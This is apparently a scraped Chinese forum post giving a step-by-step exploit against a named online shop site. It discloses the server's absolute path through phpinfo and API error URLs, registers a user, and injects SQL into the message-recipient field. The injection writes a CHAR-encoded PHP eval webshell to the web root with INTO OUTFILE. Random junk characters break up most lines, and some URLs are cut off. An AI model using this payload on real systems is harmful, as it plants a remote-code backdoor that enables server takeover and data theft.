第一个:想办法找到目标网站的绝对路径- b: A* l' ]% j% h. o$ d) t
9 F- e' g& A$ h# j1 hhttp://www.political-security.com/install/svinfo.php?phpinfo=true
X: ^# w' V- a% c" q4 h4 O+ X8 I& m7 {& p; C
http:/www.political-security.com/core/api/shop_api.php
7 V' K9 {9 D; Z& N7 n: U( X1 I8 ?) |1 L+ z0 H
http://www.political-security.co ... api_b2b_2_0_cat.php
+ [1 L9 x$ X& p8 A6 F% p! }
8 w" V# `1 E' t& k$ [8 dhttp://www.political-security.com/core/ap ... b_2_0_goodstype.php
- }# G4 Q( X: s$ t: K1 B6 @7 J5 t9 ~
http://www.political-security.co ... i_b2b_2_0_brand.php9 Z9 W: V, N8 i) ?' X( u
第二个:注册一个普通用户7 r% o4 V& D' c
* ^5 b8 B) }% U, ihttp://www.political-security.com/?passport-signup.html
2 c9 `. u2 p8 }9 a, V
6 P8 |( b! b& f# P: d% G5 S1 x2 c第三个: 发送消息 & j6 D! _' P3 c, f% `- Z
5 m+ \8 s H0 ^0 W# }' Y3 v" o
http://www.political-security.com/?member-send.html
1 V; l8 K/ ~- i发送给中填写2 I! @$ p x+ h" `( s
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |